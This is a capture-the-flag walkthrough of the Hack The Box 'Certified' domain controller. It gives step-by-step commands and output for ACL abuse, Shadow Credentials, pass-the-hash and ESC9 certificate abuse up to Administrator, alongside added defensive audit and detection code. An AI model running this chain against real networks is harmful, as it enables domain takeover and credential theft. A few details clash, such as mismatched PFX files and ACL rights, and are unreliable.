Hello everyone! Here I'm back with another Hack The Box machine, Certified. This is an Active Directory machine that focuses on certificate exploitation and privilege escalation via ESC9 (Certificate Service Vulnerability).
Initial Scanning
As usual, we start by scanning the target with nmap:
└─# nmap -sCV -Pn 10.10.11.41 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 09:38 EST
Nmap scan report for 10.10.11.41
Host is up (0.43s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-22 21:21:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-22T21:23:09+00:00; +6h42m42s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
From the scan results we can see that the target is a domain controller exposing the standard Active Directory ports: LDAP (389/636), Kerberos (88), SMB (445) and WinRM (5985).
Additional information:
- Domain: certified.htb
- Hostname: DC01.certified.htb
User Enumeration
We are given initial credentials for the user judith.mader. Let's use them to enumerate the domain users:
└─# rpcclient -U "certified.htb/judith.mader%judith09" 10.10.11.41 -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[judith.mader] rid:[0x44f]
user:[management_svc] rid:[0x451]
user:[ca_operator] rid:[0x452]
user:[alexander.huges] rid:[0x641]
user:[harry.wilson] rid:[0x642]
user:[gregory.cameron] rid:[0x643]
We can also use netexec to RID-bruteforce the domain and get more complete information:
└─# netexec smb 10.10.11.41 -u 'judith.mader' -p 'judith09' --rid-brute
The RID bruteforce output lists the groups and users present in the domain.
BloodHound Analysis
Let's use BloodHound to map the domain and look for potential attack paths:
└─# echo "10.10.11.41 certified.htb" >> /etc/hosts
└─# netexec ldap certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-server 10.10.11.41
After analysing the BloodHound data, we find:
- User judith.mader has WriteOwner over the Management group
- The Management group has GenericWrite over the user management_svc
- User management_svc has GenericAll over the user ca_operator
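The three ACL edges above chain into one path, and this is exactly what a defender should be searching for when auditing object permissions. The following is an added example, not code from the writeup or from BloodHound: a minimal breadth-first path search over an edge list built from the findings above, which reports the chain from judith.mader to ca_operator. The edge list and the set of rights treated as takeover primitives are assumptions for the example.

```python
# Added example (not part of the original writeup or BloodHound): a minimal
# BloodHound-style path search over ACL edges, written from an auditing point
# of view: which low-privileged principal can reach which account, and how.
from collections import deque

# Constructed edge list mirroring the three BloodHound findings above:
# (source principal, right, target object). Right names follow BloodHound.
EDGES = [
    ("judith.mader", "WriteOwner", "Management"),
    ("Management", "GenericWrite", "management_svc"),
    ("management_svc", "GenericAll", "ca_operator"),
]

# Rights that let the holder take control of the target object (assumed set,
# chosen to match the primitives used later in this writeup).
TAKEOVER_RIGHTS = {"WriteOwner", "WriteDacl", "GenericWrite", "GenericAll",
                   "AddMember", "ForceChangePassword", "Owns"}


def build_graph(edges):
    """Adjacency list keeping only edges whose right is a takeover primitive."""
    graph = {}
    for src, right, dst in edges:
        if right in TAKEOVER_RIGHTS:
            graph.setdefault(src, []).append((right, dst))
    return graph


def find_path(edges, start, goal):
    """Breadth-first search from start to goal.

    Returns the hops as a list of (src, right, dst) tuples, or None when the
    goal is unreachable through takeover rights.
    """
    graph = build_graph(edges)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for right, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, right, nxt)]))
    return None


def format_path(path):
    """Render hops as 'a -(Right)-> b -(Right)-> c' for a report."""
    if not path:
        return ""
    out = path[0][0]
    for _src, right, dst in path:
        out += f" -({right})-> {dst}"
    return out


if __name__ == "__main__":
    print(format_path(find_path(EDGES, "judith.mader", "ca_operator")))
```

Each hop the search reports is one ACE that the domain admins can remove or tighten; cutting any single edge breaks the chain.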
Attack Path 1: Taking Over the Management Group
1. Set judith.mader as Owner
└─# bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
[!] S-1-5-21-729746778-2675978091-3820388244-1103 is already the owner, no modification will be made
2. Grant WriteMembers to judith.mader
└─# impacket-dacledit -action write -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=Management,CN=Users,DC=certified,DC=HTB' 'certified.htb/judith.mader':'judith09'
[*] DACL backed up to dacledit-20250222-103721.bak
[*] DACL modified successfully!
3. Add judith.mader to the Management Group
└─# net rpc group addmem "Management" "judith.mader" -U "certified.htb/judith.mader%judith09" -S "10.10.11.41"
4. Verify Group Membership
└─# net rpc group members "Management" -U "certified.htb/judith.mader%judith09" -S "10.10.11.41"
CERTIFIED\judith.mader
CERTIFIED\management_svc
CERTIFIED\Test$
Attack Path 2: Shadow Credentials Attack
Now we can run a Shadow Credentials attack against management_svc, since we are a member of the Management group, which has GenericWrite over management_svc.
1. Add an msDS-KeyCredentialLink to management_svc
└─# python3 pywhisker/pywhisker.py -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a155f35c-11c9-8dc2-87ec-b65f28365203
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: Rk6qrLju.pfx
[+] PFX exportiert nach: Rk6qrLju.pfx
[i] Passwort für PFX: Iobyev3Vtx29CY7SqWk5
2. Synchronise Time with the Domain Controller
Because of clock skew, we need to adjust the local time:
└─# timedatectl set-ntp off
└─# rdate -n 10.10.11.41
3. Obtain a TGT for management_svc
└─# python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx b3Ci3fP7.pfx -pfx-pass 'pU41RGBXoNM0IZNKJL1R' management_svc.ccache
2025-02-22 17:53:06,599 minikerberos INFO Loading certificate and key from file
2025-02-22 17:53:06,622 minikerberos INFO Requesting TGT
2025-02-22 17:53:06,873 minikerberos INFO AS-REP encryption key (you might need this later):
2025-02-22 17:53:06,873 minikerberos INFO 29f71e40fd42505ead7209b01b34fe5de018358f1dd3ff7b90cb9718217e1626
4. Use the TGT to Obtain the NT Hash
└─# export KRB5CCNAME=management_svc.ccache
└─# python3 getnthash.py certified.htb/management_svc -key 29f71e40fd42505ead7209b01b34fe5de018358f1dd3ff7b90cb9718217e1626
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c183....<management_svc hash>
Attack Path 3: Taking Over ca_operator
From BloodHound, we saw that management_svc has GenericAll over ca_operator. Let's use it to change that account's password:
└─# pth-net rpc password "ca_operator" "pass1234" -U "certified.htb"/"management_svc"%"<management_svc hash>":"<management_svc hash>" -S "10.10.11.41"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Verify that the password was changed successfully:
└─# netexec smb 10.10.11.41 -u 'ca_operator' -p 'pass1234'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\ca_operator:pass1234
ESC9 Exploitation (Certificate Template Abuse)
1. Certificate Template Analysis
Let's use Certipy to find the certificate templates that exist:
└─# certipy find -u judith.mader@certified.htb -p judith09 -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
From the JSON output we find that the certificate template “CertifiedAuthentication” has the “NoSecurityExtension” flag set. Certificates issued from it therefore carry no SID security extension, so the DC falls back to mapping the certificate to an account by UPN alone, which is what makes ESC9 possible.
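The template-side condition is a single bit in msPKI-Enrollment-Flag, and a defender can audit every published template for it rather than reading Certipy's JSON by hand. The following is an added example, not from the writeup or from Certipy: a small checker that flags a template as an ESC9 candidate when it is enabled, usable for authentication, does not require manager approval, and has the NoSecurityExtension bit set, with the DC's StrongCertificateBindingEnforcement value as a parameter because full enforcement (value 2) closes ESC9 regardless of the template. The template dicts are constructed sample data that mirror what the writeup describes, not a dump from the target.

```python
# Added example, not from the writeup or from Certipy: an audit helper for the
# template-side ESC9 precondition. Attribute names follow the AD schema; the
# template data below is constructed, not dumped from the target.

CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000  # msPKI-Enrollment-Flag: omit SID extension
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002      # msPKI-Enrollment-Flag: manager approval

# EKUs that allow a certificate to be used for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}


def is_esc9_candidate(template, strong_binding_enforcement=1):
    """Template-side ESC9 check.

    strong_binding_enforcement models the DC's StrongCertificateBindingEnforcement
    registry value: 2 (full enforcement) rejects certificates without the SID
    extension, so ESC9 is closed whatever the template says.
    The attacker-side requirement (GenericWrite over a victim account) is not
    visible from template data; check it from BloodHound/ACL output instead.
    """
    if strong_binding_enforcement == 2:
        return False
    if not template.get("enabled", False):
        return False
    flags = template["msPKI-Enrollment-Flag"]
    if not flags & CT_FLAG_NO_SECURITY_EXTENSION:
        return False
    if flags & CT_FLAG_PEND_ALL_REQUESTS:
        return False  # manager approval blocks the self-service request
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    # An empty EKU list means "no restriction", which also permits authentication.
    return not ekus or bool(ekus & AUTH_EKUS)


def audit_templates(templates, strong_binding_enforcement=1):
    """Names of templates that satisfy the ESC9 template precondition."""
    return [t["name"] for t in templates
            if is_esc9_candidate(t, strong_binding_enforcement)]


# Constructed sample templates (assumed values, not the target's real data).
TEMPLATES = [
    {"name": "CertifiedAuthentication", "enabled": True,
     "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.2.3.4"]},
    {"name": "User", "enabled": True,           # SID extension kept
     "msPKI-Enrollment-Flag": 0x00000029,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"]},
    {"name": "ApprovedOnly", "enabled": True,   # NoSecurityExtension, but manager approval
     "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION | CT_FLAG_PEND_ALL_REQUESTS,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]},
    {"name": "WebServer", "enabled": True,      # no authentication EKU
     "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"]},
]

if __name__ == "__main__":
    print(audit_templates(TEMPLATES))                                # ['CertifiedAuthentication']
    print(audit_templates(TEMPLATES, strong_binding_enforcement=2))  # []
```

The fix on the template side is to clear the NoSecurityExtension bit; on the DC side, setting StrongCertificateBindingEnforcement to 2 makes the UPN trick fail even for templates that still have the bit set.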
2. Changing the UPN (User Principal Name) of ca_operator
First, check the current UPN:
└─# ldapsearch -x -H ldap://10.10.11.41 -D "judith.mader@certified.htb" -w "judith09" -b "DC=certified,DC=htb" "(sAMAccountName=ca_operator)" userPrincipalName
# operator ca, Users, certified.htb
dn: CN=operator ca,CN=Users,DC=certified,DC=htb
userPrincipalName: ca_operator@certified.htb
Now modify ca_operator's UPN to Administrator:
└─# certipy account update -username management_svc@10.10.11.41 -hashes <management_svc hash> -user ca_operator -upn Administrator -debug
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
3. Request a Certificate as Administrator
└─# certipy req -username ca_operator@10.10.11.41 -p pass1234 -ca certified-DC01-CA -template CertifiedAuthentication -debug
[+] Generating RSA key
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 20
[*] Got certificate with UPN 'Administrator'
[*] Saved certificate and private key to 'administrator.pfx
4. Authenticate with the Administrator Certificate
└─# certipy-ad auth -pfx administrator.pfx -domain certified.htb
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608b<adminhash>
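Every step of the chain above leaves a trace in the Windows Security log: the msDS-KeyCredentialLink write on management_svc (event 5136), the UPN change on ca_operator (event 4738) and a certificate issued to ca_operator whose UPN is Administrator (event 4887). The following is an added example, not from the writeup: three detection rules run over constructed events. The events are simplified dicts whose field names are modelled on the Windows event data but are assumptions for this example; a real pipeline would map its own field names, and in particular the UPN inside an issued certificate has to be taken from the CA database or request attributes rather than from a single 4887 field.

```python
# Added example, not from the writeup: three detection rules for the
# Shadow Credentials -> UPN change -> ESC9 certificate chain, run over
# constructed, simplified Security-log events. Field names are assumptions
# modelled on the Windows event data (5136, 4738, 4887).
PRIVILEGED = {"administrator", "krbtgt"}


def _local_part(name):
    """'Administrator', 'CERTIFIED\\ca_operator' or 'bob@certified.htb' -> account name."""
    return name.split("@", 1)[0].split("\\")[-1].lower()


def detect_shadow_credentials(ev):
    # Rule 1: msDS-KeyCredentialLink written on a directory object. Legitimate
    # writes come from device enrollment; a user writing it on another account
    # is the Shadow Credentials pattern.
    if ev.get("EventID") != 5136:
        return None
    if ev.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
        return None
    return ("shadow_credentials",
            f"{ev['SubjectUserName']} wrote msDS-KeyCredentialLink on {ev['ObjectDN']}")


def detect_upn_tamper(ev):
    # Rule 2: UPN changed to a value that does not match the account name,
    # or to the name of a privileged account. "-" means the UPN was unchanged.
    if ev.get("EventID") != 4738:
        return None
    upn = ev.get("UserPrincipalName", "-")
    if upn in ("", "-"):
        return None
    new, target = _local_part(upn), ev["TargetUserName"].lower()
    if new != target or new in PRIVILEGED:
        return ("upn_tamper",
                f"{ev['SubjectUserName']} set UPN of {target} to {upn}")
    return None


def detect_foreign_upn_cert(ev):
    # Rule 3: certificate issued whose UPN is not the requester's own account.
    if ev.get("EventID") != 4887:
        return None
    if _local_part(ev["Requester"]) != _local_part(ev["SubjectUPN"]):
        return ("foreign_upn_cert",
                f"{ev['Requester']} obtained a {ev['CertificateTemplate']} "
                f"certificate with UPN {ev['SubjectUPN']}")
    return None


RULES = (detect_shadow_credentials, detect_upn_tamper, detect_foreign_upn_cert)


def run_detections(events):
    """Apply every rule to every event; return the list of (rule, summary) hits."""
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append(hit)
    return hits


# Constructed sample events mirroring the chain in this writeup plus two benign ones.
EVENTS = [
    {"EventID": 5136, "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management service,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"EventID": 4738, "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "Administrator"},
    {"EventID": 4738, "SubjectUserName": "Administrator",      # benign: UPN unchanged
     "TargetUserName": "harry.wilson", "UserPrincipalName": "-"},
    {"EventID": 4887, "Requester": "CERTIFIED\\ca_operator",
     "CertificateTemplate": "CertifiedAuthentication", "SubjectUPN": "Administrator"},
    {"EventID": 4887, "Requester": "CERTIFIED\\harry.wilson",  # benign: own UPN
     "CertificateTemplate": "User", "SubjectUPN": "harry.wilson@certified.htb"},
]

if __name__ == "__main__":
    for rule, summary in run_detections(EVENTS):
        print(f"[{rule}] {summary}")
```

Rule 2 on its own catches the ESC9 preparation step regardless of which template is used, because a UPN that does not match the account name is almost never legitimate; rule 3 is the confirmation that the tampered UPN was actually turned into a certificate.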
Getting the Flags
Now we can use the administrator hash to log in via WinRM and grab the flags:
└─# evil-winrm -i certified.htb -u administrator -H "adminhash"
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
02c04e8f7d90cbb4bfd20866b7b7bae5
*Evil-WinRM* PS C:\Users\management_svc\Desktop> cat user.txt
8b0fc979572a3ff126f975f91120a282
Conclusion
The Certified machine demonstrates several common Active Directory attack techniques:
- WriteOwner Group Takeover – taking control of the Management group by abusing WriteOwner
- Shadow Credentials Attack – obtaining management_svc's credentials without changing its password
- ESC9 (Certificate Template Abuse) – using a vulnerable certificate template to gain access as Administrator
Attack Path Summary
judith.mader (WriteOwner) → Management Group → management_svc (GenericAll) → ca_operator → ESC9 → Administrator